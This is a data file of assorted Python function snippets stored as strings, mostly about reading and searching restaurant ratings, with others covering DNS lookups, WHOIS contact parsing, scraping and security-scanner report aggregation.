"def test_nyc_restaurant_grades():\n\tcamisarray = cleandata.CAMIS.unique()# get the CAMIS_ID uniquely\n\tsumgrade = [] # the list that contain all restaurants' sum grade\n\tfor i in range(len(camisarray)):\n\n\t\tcamis_id = camisarray[i]# get each restaurant's CAMIS_ID\n\t\tgradeseries = (cleandata[cleandata.CAMIS == camis_id]).GRADE\n\t\ttempList = []\n\t\tfor ele in gradeseries:\n\t\t\ttempList.append(ele) ###### the tempList is used to calculate each restaurant's grade\n\t\tk = test_grades(tempList) ### k is the sum grade of each restaurant \n\t \tsumgrade.append(k) #### list sumgrade append each restaurant's grade a\n\treturn sum(sumgrade) ###return the sum of all restaurants ",
"def query_api(term, location, RADIUS_SIZE, RESTRICTED):\n response = search(API_KEY, term, location, 0, RADIUS_SIZE)\n businesses = response.get('businesses')\n\n if not businesses:\n print(u'No businesses for {0} in {1} found.'.format(term, location))\n return\n numFound = 0\n while len(businesses) >= 50 + numFound:\n numFound += 50\n response = search(API_KEY, term, location, numFound, RADIUS_SIZE)\n more_businesses = response.get('businesses')\n if more_businesses is not None:\n businesses.extend(more_businesses)\n\n names = []\n contacts = []\n addresses = []\n urls = []\n categories = []\n city = []\n state = []\n zipcode = []\n radius = []\n #Create a list from the names\n #Cross reference with restricted and delete elements that are matching\n for i in range(0, len(businesses)):\n not_matched = True\n for j in range (0, len(RESTRICTED)):\n if(businesses[i]['name'] == RESTRICTED[j].strip('\\n')):\n not_matched = False\n if(not_matched and (businesses[i]['distance']) < RADIUS_SIZE):\n names.append(businesses[i]['name'])\n radius.append(businesses[i]['distance'] / 1600)\n contacts.append(businesses[i]['display_phone'])\n addresses.append(businesses[i]['location']['address1'])\n city.append(businesses[i]['location']['city'])\n state.append(businesses[i]['location']['state'])\n zipcode.append(businesses[i]['location']['zip_code'])\n categories.append(businesses[i]['categories'][0]['title'])\n urls.append(businesses[i]['url'])\n list_restaurants = open('target_restaurants.txt', 'w')\n for x in range(0, len(names)):\n try:\n list_restaurants.write(\"%s\\t\" % names[x])\n list_restaurants.write(\"%s\\t\" % contacts[x])\n list_restaurants.write(\"%s\\t\" % radius[x])\n list_restaurants.write(\"%s\\t\" % addresses[x])\n list_restaurants.write(\"%s\\t\" % city[x])\n list_restaurants.write(\"%s\\t\" % state[x])\n list_restaurants.write(\"%s\\t\" % zipcode[x])\n list_restaurants.write(\"%s\\t\" % categories[x])\n list_restaurants.write(\"%s\\n\" % urls[x])\n except UnicodeEncodeError:\n continue\n\n print(\"Businesses found and printed to target_restaurants.txt file\")",
"def restaurant_rater(input_filename):\n\n #Open input file\n restaurant_scores_source = open(input_filename)\n\n #Initialize restaurant_ratings dictionary\n restaurant_ratings = {}\n\n #Ask user for a restaurant name and rating and store resulting strings\n user_add_restaurant = raw_input(\"Please add the name of a restaurant you would like to rate: \")\n user_add_score = int(raw_input(\"Please enter the rating: \"))\n\n #Add user input to dictionary\n restaurant_ratings.update({user_add_restaurant: user_add_score})\n\n #Loop through each line in input file\n for line in restaurant_scores_source:\n #Strips and splits each line at : and unpacks list into name and rating\n name, rating = line.rstrip().split(\":\")\n\n #Add keys and values to restaurant_ratings based on name and rating\n restaurant_ratings[name] = int(rating)\n\n for restaurant in sorted(restaurant_ratings):\n print restaurant, \"is rated at\", restaurant_ratings[restaurant]\n \n restaurant_scores_source.close()",
"def appending_food_item_names(food_item_names: list) -> None:\n for item in _calories:\n food_item_names.append(item)",
"def restaurant_ratings(filename):\n\n lines = open(filename)\n\n restaurant_dict = {}\n\n\n for restaurants in lines:\n restaurants = restaurants.rstrip()\n restaurant, rating = restaurants.split(\":\")\n\n restaurant_dict[restaurant] = int(rating)\n\n # user_input_restaurant()\n\n # restaurant_dict[user_restaurant_input[0]] = user_restaurant_input[1]\n\n # sorted_restaurants = sorted(restaurant_dict.items())\n\n\n # for restaurant, rating in sorted_restaurants:\n # print \"%s is rated at %s\" % (restaurant, rating)\n\n return restaurant_dict",
"def consolidate_ingredients(breakfasts, lunches, dinners):\n total_ingredients = {}\n meals = [breakfasts, lunches, dinners]\n\n for meal in meals:\n for collection in meal:\n ingredients = fetch_ingredients(collection)\n for lst in ingredients:\n if lst[0] in total_ingredients:\n total_ingredients[lst[0]][0] += lst[1]\n total_ingredients[lst[0]][1].add(lst[2])\n else:\n total_ingredients[lst[0]] = [lst[1], set([lst[2]])]\n\n return total_ingredients",
"def get_organism_names(results):\r\n\r\n organism_names = []\r\n\r\n for result in results:\r\n organism_names.append(result)\r\n\r\n return organism_names",
"def read_restaurant(file):\r\n name_to_rating = {}\r\n price_to_names = {'$':[], '4$':[],'$$$':[],'$$':[]}\r\n cuisine_to_names = {}",
"def flatten(counts):\n single_names = {}\n long_names = {}\n for i in range(len(counts.items())):\n if(len(counts.items()[i][0].split(\" \")) <= 1):\n single_names[str(counts.items()[i][0])] = counts.items()[i][1]\n else:\n long_names[str(counts.items()[i][0])] = counts.items()[i][1]\n \n starter_list = [[[x[0]],x[1]] for x in long_names.items()]\n for i in range(len(single_names.items())):\n matched = False\n for j in range(len(starter_list)):\n if(single_names.items()[i][0] in starter_list[j][0][0].split(\" \")):\n starter_list[j][0].append(single_names.items()[i][0])\n starter_list[j][1] += single_names.items()[i][1]\n matched = True\n break\n \n if(matched == False):\n starter_list.append([[single_names.items()[i][0]], single_names.items()[i][1]]) \n \n \n return starter_list",
"def drug_names():\n results = set()\n if 'qry' in request.args and len(request.args['qry']) >= 3:\n look_for = f\"{request.args['qry'].lower()}%\"\n drug_list = FTA.find_by_name(look_for, False )\n results = set([f\"{d.PROPRIETARY_NAME} - {d.NONPROPRIETARY_NAME}\" for d in drug_list if d.ACTIVE])\n\n results = sorted(list(results))\n return jsonify(results)",
"def get_restaurants():\n restaurants = []\n start = 0\n\n while(True):\n response = requests.get(REQUEST_URL + \"&start=\" + str(start), \\\n headers=HEADERS)\n response_body = json.loads(response.text)\n if (response_body[\"results_shown\"] < 1):\n break\n \n restaurants += response_body[\"restaurants\"] \n start += 20\n\n return restaurants",
"def compute_allergens(foods):\n\n # Create a dictionary mapping allergens to lists\n # of ingredients that may contain that allergen\n allergen_foods = {}\n for ingredients, allergens in foods:\n for allergen in allergens:\n allergen_foods.setdefault(allergen, []).append(set(ingredients))\n\n # For each allergen, compute the intersection of the lists\n # computed above. This will give us the set of ingredienta\n # that could contain that allergen\n candidate_ingredients = {}\n for allergen in allergen_foods:\n candidate_ingredients[allergen] = set.intersection(*allergen_foods[allergen])\n\n # Repeatedly find an allergen that can only be matched to a single\n # ingredient, and remove that ingredient from the list of candidate\n # ingredients for all the other allergens.\n allergens = {}\n while len(candidate_ingredients) > 0:\n\n for single_allergen, cings in candidate_ingredients.items():\n if len(cings) == 1:\n ingredient = cings.pop()\n allergens[single_allergen] = ingredient\n break\n\n del candidate_ingredients[single_allergen] \n\n for allergen in candidate_ingredients:\n if allergen != single_allergen:\n ingredient = allergens[single_allergen]\n candidate_ingredients[allergen].discard(ingredient)\n\n return allergens",
"def alphabetize_restaurant(filename):\n\n restaurant_reviews = open(filename)\n\n book_of_reviews = []\n for line in restaurant_reviews:\n reviews = line.rstrip()\n reviews_list = reviews.split(\":\")\n book_of_reviews.append(reviews_list)\n \n dictionary_reviews = {}\n for review in book_of_reviews: \n dictionary_reviews[review[0]] = review[1]\n\n new_restaurant = input(\"What is the name of your restaurant? > \") \n new_rating = int(input(\"What is the rating of your restaurant? > \"))\n \n dictionary_reviews[new_restaurant] = new_rating \n \n dictionary_reviews = sorted(dictionary_reviews.items())\n \n for restaurant_name in dictionary_reviews:\n print(f\"{restaurant_name[0]} is rated at {restaurant_name[1]}.\")",
"def findARestaurant(mealType,location):\n\t#1. Use getGeocodeLocation to get the latitude and longitude coordinates of the location string.\n\t# lat_lng = f\"{getGeocodeLocation(location)}\"\n\t# lat_lng_formatted = lat_lng[lat_lng.find(\"(\")+1:lat_lng.find(\")\")]\n\tlatitude, longitude = getGeocodeLocation(location)\n\n\t#2. Use foursquare API to find a nearby restaurant with the latitude, longitude, and mealType strings.\n\t#HINT: format for url will be something like https://api.foursquare.com/v2/venues/search?client_id=CLIENT_ID&client_secret=CLIENT_SECRET&v=20130815&ll=40.7,-74&query=sushi\n\turl = (f\"https://api.foursquare.com/v2/venues/search?client_id={foursquare_client_id}&client_secret={foursquare_client_secret}&v={version}&ll={latitude},{longitude}&intent=browse&radius=10000&query={mealType}&limit=10\")\n\th = httplib2.Http()\n\tresult = json.loads(h.request(url, \"GET\")[1])\n\n\t#3. Grab the first restaurant\n\tvenue_id = result[\"response\"][\"venues\"][0][\"id\"]\n\tvenue_name = result[\"response\"][\"venues\"][0][\"name\"]\n\tvenue_location = result[\"response\"][\"venues\"][0][\"location\"]\n\n\t#4. Get a 300x300 picture of the restaurant using the venue_id (you can change this by altering the 300x300 value in the URL or replacing it with 'orginal' to get the original picture\n\timg_url = (f\"https://api.foursquare.com/v2/venues/{venue_id}/photos?client_id={foursquare_client_id}&client_secret={foursquare_client_secret}&v={version}&group=venue&limit=10\")\n\timg_h = httplib2.Http()\n\timg_result = json.loads(img_h.request(img_url, \"GET\")[1])\n\tprint(img_result)\n\n\t#5. Grab the first image\n\tif len(img_result[\"response\"][\"photos\"][\"items\"]) > 0:\n\t\timg_url = f\"{img_url_pre_lim['prefix']}300x300{img_url_pre_lim['suffix']}\"\n\n\t#6. If no image is available, insert default a image url\n\telse:\n\t\timg_url = \"https://cps-static.rovicorp.com/3/JPG_400/MI0003/711/MI0003711195.jpg?partner=allrovi.com\"\n\n\t#7. Return a dictionary containing the restaurant name, address, and image url\t\n\tresult = {\"name\": venue_name, \"address\": venue_location.get(\"address\",\"\"), \"img_url\": img_url}\n\tprint(result)\n\treturn result",
"def query_restaurants_by_name_and_location(collection, restaurant_name, radius, lat, lon):\n results = collection.find(\n {'location': {'$nearSphere': {'$geometry': {'type': \"Point\",\n 'coordinates': [float(lon), float(lat)]},\n '$maxDistance': radius}},\n 'name': {'$regex': restaurant_name, \"$options\": \"i\"}},\n {\"_id\": 0})\n\n return results",
"def memorize_restaurant_facts(self, name, cuisine=None, location=None):\n n = self._add_node(name, \"restaurant_name\")\n if cuisine is not None:\n c = self._add_node(cuisine, \"cuisine\")\n n.relationships.create(\"is_a\", c)\n if location is not None:\n l = self._add_node(location, \"location\")\n n.relationships.create(\"located\", l)",
"def get_athletes(self, nocs=[], names=[]):\n query_head = '''SELECT DISTINCT athletes.full_name, nocs.noc_name\n FROM athletes, nocs, athletes_nocs\n WHERE athletes.id = athletes_nocs.athlete_id\n AND nocs.id = athletes_nocs.noc_id'''\n \n query_tail = '''ORDER BY athletes.full_name;'''\n\n final_result_set = set()\n\n if nocs:\n noc_result_set = set()\n for noc in nocs:\n query_full = query_head + \\\n \"\\nAND nocs.noc_name like '%{}%'\".format(noc.upper())\\\n + query_tail\n self.__cursor.execute(query_full)\n for row in self.__cursor:\n noc_result_set.add(row)\n final_result_set = noc_result_set\n\n if names:\n name_result_set = set()\n for name in names:\n query_full = query_head + \\\n \"\\nAND lower(athletes.full_name) like '%{}%'\".format(name.lower())\\\n + query_tail\n self.__cursor.execute(query_full)\n for row in self.__cursor:\n name_result_set.add(row)\n \n if final_result_set:\n final_result_set &= name_result_set \n else:\n final_result_set = name_result_set \n \n final_result_list = sorted(list(final_result_set), key=lambda x: x[0])\n return final_result_list",
"def collect_results(name: str) -> dict:\n full_response = {}\n target_name = dns.name.from_text(name)\n # lookup CNAME\n response = lookup(target_name, dns.rdatatype.CNAME)\n cnames = []\n for answers in response.answer:\n for answer in answers:\n cnames.append({\"name\": answer, \"alias\": name})\n # lookup A\n response = lookup(target_name, dns.rdatatype.A)\n arecords = []\n for answers in response.answer:\n a_name = answers.name\n for answer in answers:\n if answer.rdtype == 1: # A record\n arecords.append({\"name\": a_name, \"address\": str(answer)})\n # lookup AAAA\n response = lookup(target_name, dns.rdatatype.AAAA)\n aaaarecords = []\n for answers in response.answer:\n aaaa_name = answers.name\n for answer in answers:\n if answer.rdtype == 28: # AAAA record\n aaaarecords.append({\"name\": aaaa_name, \"address\": str(answer)})\n # lookup MX\n response = lookup(target_name, dns.rdatatype.MX)\n mxrecords = []\n for answers in response.answer:\n mx_name = answers.name\n for answer in answers:\n if answer.rdtype == 15: # MX record\n mxrecords.append({\"name\": mx_name,\n \"preference\": answer.preference,\n \"exchange\": str(answer.exchange)})\n\n full_response[\"CNAME\"] = cnames\n full_response[\"A\"] = arecords\n full_response[\"AAAA\"] = aaaarecords\n full_response[\"MX\"] = mxrecords\n\n return full_response",
"def get_all_restaurants():\n return list(Restaurant.objects.all().values())",
"def calculate_total_score(data, ratings):\n total_score = 0\n\n for x in data:\n x_key = generate_name_key(x)\n total_score += ratings[x_key]['avg_score'] if x_key in ratings else 0\n\n return total_score",
"def parse_one_restaurant():\n\t\n\t# Used for determining on which page error occurs\n\tglobal on_tags, on_details\n\ttry:\n\t\ton_details = True\n\t\ton_tags = False\n\t\t\n\t\t# Get all of useful params of this page\n\t\tname = wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, 'h1.section-hero-header-title-title'))).text\n\t\ttype = driver.find_element_by_css_selector(\n\t\t\t'div.GLOBAL__gm2-body-2:nth-child(2)>span:nth-child(1)>span:nth-child(1)>button:nth-child(1)').text\n\t\tcost = driver.find_element_by_css_selector(\n\t\t\t'span.section-rating-term:nth-child(2)>span:nth-child(2)>span:nth-child(1)>span:nth-child(2)').text\n\t\trating_and_num = driver.find_element_by_css_selector('div.GLOBAL__gm2-body-2')\n\t\trating = rating_and_num.text.split('\\n')[0]\n\t\tnum = rating_and_num.text.split('\\n')[1].split('·')[0]\n\t\topen_hours = driver.find_element_by_css_selector('span.section-info-text:nth-child(2)').text.strip()\n\t\t\n\t\t# Get to the all tags of restaurant page\n\t\ttags_page = wait.until(EC.element_to_be_clickable((By.CSS_SELECTOR, '.section-editorial')))\n\t\ttry:\n\t\t\ttags_page.click()\n\t\texcept ElementClickInterceptedException:\n\t\t\tsleep(0.2)\n\t\t\ttags_page.click()\n\t\ton_tags = True\n\t\ton_details = False\n\t\t\n\t\t# Get params from tags page\n\t\tneg = driver.find_elements_by_class_name('section-attribute-group-item-negative')\n\t\tall_negs = set(i.text for i in neg)\n\t\tpos = driver.find_elements_by_class_name('section-attribute-group-item')\n\t\tall_pos = set(i.text for i in pos) - all_negs\n\t\t\n\t\t# Create new Restaurant class so that all params are gathered together\n\t\tcollected_rest = Restaurant(name, type, cost, rating, num, open_hours, all_pos, all_negs)\n\t\treturn collected_rest.to_numpy_array()\n\t\t\n\t# Catch an error and so skip current restaurant\n\texcept (IndexError, NoSuchElementException, TimeoutException):\n\t\treturn None",
"def collect_results(name: str) -> dict:\n full_response = {}\n\n target_name = dns.name.from_text(name)\n\n # lookup CNAME\n response = lookup(target_name, dns.rdatatype.CNAME)\n cnames = []\n if response is not None:\n for answers in response.answer:\n for answer in answers:\n cnames.append({\"name\": answer, \"alias\": name})\n\n # lookup A\n response = lookup(target_name, dns.rdatatype.A)\n arecords = []\n\n if response is not None:\n for answers in response.answer:\n a_name = answers.name\n for answer in answers:\n if answer.rdtype == 1: # A record\n arecords.append({\"name\": a_name, \"address\": str(answer)})\n\n # lookup AAAA\n response = lookup(target_name, dns.rdatatype.AAAA)\n aaaarecords = []\n\n if response is not None:\n for answers in response.answer:\n aaaa_name = answers.name\n for answer in answers:\n if answer.rdtype == 28: # AAAA record\n aaaarecords.append({\"name\": aaaa_name, \"address\": str(answer)})\n\n # lookup MX\n response = lookup(target_name, dns.rdatatype.MX)\n mxrecords = []\n if response is not None:\n for answers in response.answer:\n mx_name = answers.name\n for answer in answers:\n if answer.rdtype == 15: # MX record\n mxrecords.append({\"name\": mx_name,\n \"preference\": answer.preference,\n \"exchange\": str(answer.exchange)})\n\n full_response[\"CNAME\"] = cnames\n full_response[\"A\"] = arecords\n full_response[\"AAAA\"] = aaaarecords\n full_response[\"MX\"] = mxrecords\n\n return full_response",
"def collect_data(self, data: Restaurant) -> Restaurant:\n print('-' * 40)\n print(f'{data.name} | {data.pnr}')\n params = {\n 'enhedstype': 'produktionsenhed',\n 'id': data.pnr,\n 'language': 'da',\n 'soeg': data.pnr,\n }\n\n print(f'{self.URL} | {params}')\n res = get(self.URL, params=params)\n soup = BeautifulSoup(res.content.decode('utf-8'), 'html.parser')\n\n for appender in self.appenders:\n data = appender(soup, data)\n\n return super().collect_data(data)",
"def baby_search_engine(name):\r\n \r\n name_ranking = []\r\n \r\n for publication_name, name_list in baby_names.items():\r\n publication = {}\r\n if name.capitalize() in name_list:\r\n publication['list'] = publication_name\r\n publication['rank'] = name_list.index(name.capitalize()) + 1\r\n name_ranking.append(publication)\r\n\r\n \r\n return sorted(name_ranking, key=lambda k: k['rank'])",
"def get_names(parsed_data):\n known_values = []\n result = []\n # get name from contacts\n contacts = {'registrant_contact': [], 'administrative_contact': [], 'technical_contact': [],\n 'domain_registrar': []}\n if 'registrant_contact' in parsed_data:\n contacts['registrant_contact'].append(parsed_data['registrant_contact'])\n if 'administrative_contact' in parsed_data:\n contacts['administrative_contact'].append(parsed_data['administrative_contact'])\n if 'technical_contact' in parsed_data:\n contacts['technical_contact'].append(parsed_data['technical_contact'])\n if 'domain_registrar' in parsed_data:\n contacts['domain_registrar'].append(parsed_data['domain_registrar'])\n\n for contact, info in contacts.items():\n # properties dictionary\n fax = {'fax': '', 'type': 4}\n phone = {'phone': '', 'type': 4}\n country = {'country': '', 'type': 11}\n street = {'street': '', 'type': 8}\n city = {'city': '', 'type': 11}\n email = {'email': '', 'type': 2}\n if info is not None:\n d = {'type': 11, 'data': '', 'properties': {}, 'special_properties': {}, 'ref': {}}\n properties_list = []\n special_properties_list = []\n d.update({'ref': {'task': 'whois', 'whois_for': '', 'whois_from': ''}})\n if 'domain_name' in parsed_data and len(parsed_data['domain_name']) > 0:\n d['ref']['whois_for'] = parsed_data['domain_name']\n if 'whois_server' in parsed_data:\n d['ref']['whois_from'] = parsed_data['whois_server']\n\n for name in info:\n if 'full_name' in name:\n if name['full_name'] in known_values:\n break\n if 'registrar_name' in name:\n if name['registrar_name'] in known_values:\n break\n\n for feature in name.keys():\n if feature == 'full_name':\n d['data'] = name['full_name']\n known_values.append(name['full_name'])\n if feature == 'registrar_name':\n d['data'] = name['registrar_name']\n known_values.append(name['registrar_name'])\n if feature == 'city_name':\n city['city'] = name['city_name']\n if feature == 'street_name':\n street['street'] = name['street_name']\n if feature == 'country_name':\n country['country'] = name['country_name']\n if feature == 'phone_number':\n phone['phone'] = name['phone_number']\n if feature == 'fax_number':\n fax['fax'] = name['fax_number']\n if feature == 'email_address':\n email['email'] = name['email_address']\n # if name is null, discard other info\n if d['data'] == '':\n continue\n # saving name special properties\n special_properties_list.append({'is_username': False, 'type': 0})\n special_properties_list.append({'is_domain_name': False, 'type': 0})\n special_properties_list.append({'is_public_name': False, 'type': 0})\n special_properties_list.append({'is_account_name': False, 'type': 0})\n d['special_properties'] = special_properties_list\n properties_list.append(fax)\n properties_list.append(phone)\n properties_list.append(country)\n properties_list.append(street)\n properties_list.append(city)\n properties_list.append(email)\n d['properties'] = properties_list\n result.append(d)\n return result",
"def describe_restaurant(self):\n\t\tprint(\"name of the restaurant is \" + self.restaurant_name)\n\t\tprint(\"cuisine type is \" + self.cuisine_type)",
"def extracttfidf_restaurant(restaurant_indexed_reviews):\n restaurant_feature = dict()\n restaurant_all_reviews = []\n for restaurant in restaurant_indexed_reviews:\n reviews_content = ''\n for user in restaurant_indexed_reviews[restaurant]:\n reviews = restaurant_indexed_reviews[restaurant][user]\n for review in reviews:\n reviews_content += review['text'][0:len(review['text'])-1]\n restaurant_all_reviews.append(reviews_content)\n\t# count words\n vectorizer = TfidfVectorizer(min_df=1)\n word_count = vectorizer.fit_transform(restaurant_all_reviews)\n i = 0\n for restaurant in restaurant_indexed_reviews:\n restaurant_feature[restaurant] = word_count[i, :]\n i = i + 1\n return restaurant_feature",
"def print_alph_restaurant_ratings(restaurant_dict): \n\n for restaurant_name, rating in sorted(restaurant_dict.items()):\n # print \"{} is rated at {}.\".format(restaurant_name,\n # rating)\n\n \n restaurant_name = restaurant_dict.items[0]\n rating = restaurant_dict.items[1]\n\n print restaurant_name, rating",
"def extracttfidf_user(user_indexed_reviews, all_reviews, restaurant_indexed_reviews):\n user_all_reviews = []\n # count vector num in user_count\n user_count = dict()\n X_total = dict()\n y_total = dict()\n restaurant_feature = dict()\n ratings = []\n for user in user_indexed_reviews:\n user_count[user] = 0\n restaurant_reviews = user_indexed_reviews[user]\n for restaurant in restaurant_reviews:\n # extract feature\n reviews_content = ''\n reviews = restaurant_reviews[restaurant]\n for review in reviews:\n reviews_content += review['text'][0:len(review['text'])-1]\n if reviews_content == '':\n continue\n user_all_reviews.append(reviews_content)\n # compute label\n rating = round(utils.cal_average_rating(reviews)*2)\n ratings.append(rating)\n # count words\n user_count[user] += 1\n user_all_reviews += all_reviews\n vectorizer = TfidfVectorizer(min_df=1)\n word_count = vectorizer.fit_transform(user_all_reviews)\n\n sum_count = 0\n for user in user_indexed_reviews:\n if user_count[user] == 0:\n X_total[user] = None\n y_total[user] = None\n else:\n X_total[user] = word_count[sum_count:sum_count+user_count[user]+1, :]\n y_total[user] = np.array(ratings[sum_count:sum_count+user_count[user]+1])\n sum_count += user_count[user]\n\n i = sum_count\n for restaurant in restaurant_indexed_reviews:\n restaurant_feature[restaurant] = word_count[i, :]\n i = i + 1\n print i, sum_count\n return X_total,y_total,restaurant_feature",
"def gets_restaurant_ratings(text_file):\n file = open(text_file)\n restaurant_ratings_dictionary = {}\n\n for line in file:\n line = line.rstrip().split(\":\")\n restaurant_name, rating = line\n restaurant_ratings_dictionary[restaurant_name] = rating\n\n file.close()\n\n return restaurant_ratings_dictionary",
"def aggregate_results(self):\n\n raise NotImplementedError",
"def get_alternative_restaurants(self,alternative_preferences):\n import itertools\n all_alternative_pref=[]\n all_alternative_restaurants=[]\n for r in itertools.product(alternative_preferences[0], alternative_preferences[1],alternative_preferences[2]): \n all_alternative_pref.append([r[0], r[1],r[2]])\n for a in all_alternative_pref:\n all_alternative_restaurants.append(self.lookup(a))\n all_alternative_restaurants = [item for sublist in all_alternative_restaurants for item in sublist]\n\n return all_alternative_restaurants",
"async def flavors():\n berry = []\n apple = []\n honey = []\n mango = []\n earthy = []\n mint = []\n blueberry = []\n ammonia = []\n coffee = []\n vanilla = []\n rose = []\n pine = []\n citrus = []\n sweet = []\n pineapple = []\n skunk = []\n orange = []\n strawberry = []\n lemon = []\n grape = []\n lime = []\n pepper = []\n lavender = []\n\n for i in list(range(len(strain))):\n if 'Coffee' in strain['flavor'][i]:\n coffee.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Pepper' in strain['flavor'][i]:\n pepper.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Lavender' in strain['flavor'][i]:\n lavender.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Mango' in strain['flavor'][i]:\n mango.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Earthy' in strain['flavor'][i]:\n earthy.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Citrus' in strain['flavor'][i]:\n citrus.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Lemon' in strain['flavor'][i]:\n lemon.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Strawberry' in strain['flavor'][i]:\n strawberry.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Pine' in strain['flavor'][i]:\n pine.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Vanilla' in strain['flavor'][i]:\n vanilla.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Honey' in strain['flavor'][i]:\n honey.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Pineapple' in strain['flavor'][i]:\n pineapple.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Blueberry' in strain['flavor'][i]:\n blueberry.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Orange' in strain['flavor'][i]:\n orange.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Skunk' in strain['flavor'][i]:\n skunk.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Grape' in strain['flavor'][i]:\n grape.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Berry' in strain['flavor'][i]:\n berry.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Lime' in strain['flavor'][i]:\n lime.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Rose' in strain['flavor'][i]:\n rose.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Sweet' in strain['flavor'][i]:\n sweet.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Apple' in strain['flavor'][i]:\n apple.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Mint' in strain['flavor'][i]:\n mint.append(strain['name'][i])\n for i in list(range(len(strain))):\n if 'Ammonia' in strain['flavor'][i]:\n ammonia.append(strain['name'][i])\n\n json_berry = json.dumps(berry)\n json_apple = json.dumps(apple)\n json_honey = json.dumps(honey)\n json_mango = json.dumps(mango)\n json_earthy = json.dumps(earthy)\n json_mint = json.dumps(mint)\n json_bluberry = json.dumps(blueberry)\n json_ammonia = json.dumps(ammonia)\n json_coffee = json.dumps(coffee)\n json_vanilla = json.dumps(vanilla)\n json_rose = json.dumps(rose)\n json_pine = json.dumps(pine)\n json_citrus = json.dumps(citrus)\n json_sweet = json.dumps(sweet)\n json_pineapple = json.dumps(pineapple)\n json_skunk = json.dumps(skunk)\n json_orange = json.dumps(orange)\n json_strawberry = json.dumps(strawberry)\n json_lemon = json.dumps(lemon)\n json_grape = json.dumps(grape)\n json_lime = json.dumps(lime)\n json_pepper = json.dumps(pepper)\n json_lavender = json.dumps(lavender)\n\n return 'Berry', json_berry, 'Apple', json_apple, 'Honey', json_honey,\\\n 'Mango', json_mango, 'Earthy', json_earthy, 'Mint', json_mint,\\\n 'Blueberry', json_bluberry, 'Ammonia', json_ammonia, 'Coffee', json_coffee,\\\n 'Vanilla', json_vanilla, 'Rose', json_rose, 'Pine', json_pine,\\\n 'Citrus', json_citrus, 'Sweet', json_sweet, 'Pineapple', json_pineapple,\\\n 'Skunk', json_skunk, 'Orange', json_orange, 'Strawberry', json_strawberry,\\\n 'Lemon', json_lemon, 'Grape', json_grape, 'Lime', json_lime,\\\n 'Pepper', json_pepper, 'Lavender', json_lavender",
"def _process_result_file_name_aggregated(\n self,\n test,\n dupes,\n vuln_ids_from_tool,\n findingdetail,\n query,\n result,\n find_date,\n ):\n name, cwe, categories, queryId = self.getQueryElements(query)\n titleStart = query.get(\"name\").replace(\"_\", \" \")\n description, lastPathnode = self.get_description_file_name_aggregated(\n query, result\n )\n sinkFilename = lastPathnode.find(\"FileName\").text\n if sinkFilename:\n title = \"{} ({})\".format(titleStart, sinkFilename.split(\"/\")[-1])\n else:\n title = titleStart\n false_p = result.get(\"FalsePositive\")\n sev = result.get(\"Severity\")\n aggregateKeys = \"{}{}{}\".format(cwe, sev, sinkFilename)\n state = result.get(\"state\")\n active = self.isActive(state)\n verified = self.isVerified(state)\n\n if not (aggregateKeys in dupes):\n find = Finding(\n title=title,\n cwe=int(cwe),\n test=test,\n # active, verified and false_p may be overwritten later by\n # another member of the aggregate, see \"else\" below\n active=active,\n verified=verified,\n false_p=(false_p == \"True\"),\n # Concatenates the query information with this specific finding\n # information\n description=findingdetail + description,\n severity=sev,\n file_path=sinkFilename,\n # No line number because we have aggregated different\n # vulnerabilities that may have different line numbers\n date=find_date,\n static_finding=True,\n nb_occurences=1,\n )\n dupes[aggregateKeys] = find\n # a list containing the vuln_id_from_tool values. They are\n # formatted once we have analysed all the findings\n vuln_ids_from_tool[aggregateKeys] = [queryId]\n else:\n # We have already created a finding for this aggregate: updates the\n # description and the nb_occurences\n find = dupes[aggregateKeys]\n find.nb_occurences = find.nb_occurences + 1\n if find.nb_occurences == 2:\n find.description = \"### 1. {}\\n{}\".format(\n find.title, find.description\n )\n find.description = \"{}\\n\\n-----\\n### {}. {}\\n{}\\n{}\".format(\n find.description,\n find.nb_occurences,\n title,\n findingdetail,\n description,\n )\n if queryId not in vuln_ids_from_tool[aggregateKeys]:\n vuln_ids_from_tool[aggregateKeys].append(queryId)\n # If at least one of the findings in the aggregate is exploitable,\n # the defectdojo finding should not be \"false positive\"\n if false_p == \"False\":\n dupes[aggregateKeys].false_p = False\n # If at least one of the findings in the aggregate is active, the\n # defectdojo finding should be active\n if active:\n dupes[aggregateKeys].active = True\n # If at least one of the findings in the aggregate is verified, the\n # defectdojo finding should be verified\n if verified:\n dupes[aggregateKeys].verified = True",
"def get_restaurants_based_on_location(location):\n return list(Restaurant.objects.all().filter(address__contains=location).values())",
"def read_foods(foods_txt):\n foods = []\n for line in foods_txt:\n ingredients_txt, allergens_txt = line.split(\" (contains \")\n ingredients = ingredients_txt.split()\n allergens = allergens_txt[:-1].split(\", \")\n\n foods.append((ingredients, allergens))\n\n return foods",
"def restaurant_rating(filename):\n\n rating_file = open(filename)\n\n restaurant_ratings = {}\n\n for line in rating_file:\n line = line.rstrip()\n restaurant_name, rating = line.split(\":\")\n\n restaurant_ratings[restaurant_name] = rating\n\n # for restaurant, number in sorted(restaurant_ratings.items()):\n # print \"{} is rated at {}\".format(restaurant, number)\n\n\n\n # restaurant_name_input, restaurant_score_input = user_input()\n # restaurant_ratings[restaurant_name_input] = restaurant_score_input\n\n for restaurant, number in sorted(restaurant_ratings.items()):\n print \"{} is rated at {}\".format(restaurant, number)",
"def personas(self, pretty=True, sort=True):\n names = list(self.name2base)\n if pretty: names = [self.process_name(name, True) for name in names]\n if sort: names = sorted(names)\n return names",
